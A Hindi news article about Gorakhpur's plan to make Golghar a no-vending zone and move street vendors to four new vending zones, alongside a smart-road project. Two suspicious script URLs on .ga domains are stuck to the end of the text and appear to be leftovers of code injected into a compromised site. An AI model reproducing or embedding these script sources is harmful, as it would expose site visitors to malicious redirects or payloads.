गोरखपुर जिले को मिल सकता है नए साल में नो-वेंडिंग जोन का तोहफा। गोलघर को बनाया जा रहा है नो-वेंडिंग जोन। अब पटरी व्यवसायियों को शहर के विभिन्न इलाकों में बनाए जा रहे वेंडिंग जोन में जल्द ही शिफ्ट कर दिया जाएगा।
गोलघर में अभी पटरियों पर सौ से अधिक दुकानें लगती हैं जिसके कारण जाम और आवागमन की समस्या खड़ी हो जाती थी। नो वेंडिंग जोन न होने के कारण पटरी व्यवसायियों को हटाया नहीं जा पा रहा था लेकिन अब नो-वेंडिंग जोन घोषित होने के बाद गोलघर से पटरी व्यवसायियों को हटाने का रास्ता साफ हो गया है।

पिछले साल ही गोलघर से रेलवे स्टेशन होते हुए रेलवे बस स्टेशन तक की सड़क को स्मार्ट सड़क के लिए चयनित किया गया था।  था। आपको बता दें, स्मार्ट सड़क के निर्माण पर तकरीबन 54 करोड़ रुपये खर्च किए जाएंगे। स्मार्ट सड़क के दोनों तरफ खरीदारी को गोलघर आने वाले ग्राहकों के बैठने की व्यवस्था रहेगी। आपको बता दें जिन इलाकों में नो वेंडिंग जोन घोषित किया जाएगा उन इलाकों में पटरी व्यवसाय पूरी तरह से प्रतिबंधित हो जाएगा।

नगर निगम के चीफ इंजीनियर सुरेश चंद ने बताया कि पटरी व्यवसायियों को व्यवस्थित करने और शहर को जाम से निजात दिलाने के लिए नगर निगम शहर के चार इलाकों में वेंडिंग जोन बनाया जा रहा है। रामगढ़ताल के नुमाइश ग्राउंड, रुस्तमपुर ढाला, हरिओमनगर और ट्रांसपोर्टनगर महेवा में करीब चार करोड़ की लागत से वेंडिंग जोन बनाकर करीब 500 पटरी व्यवसायियों को स्थान मुहैया कराया जा रहा है।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.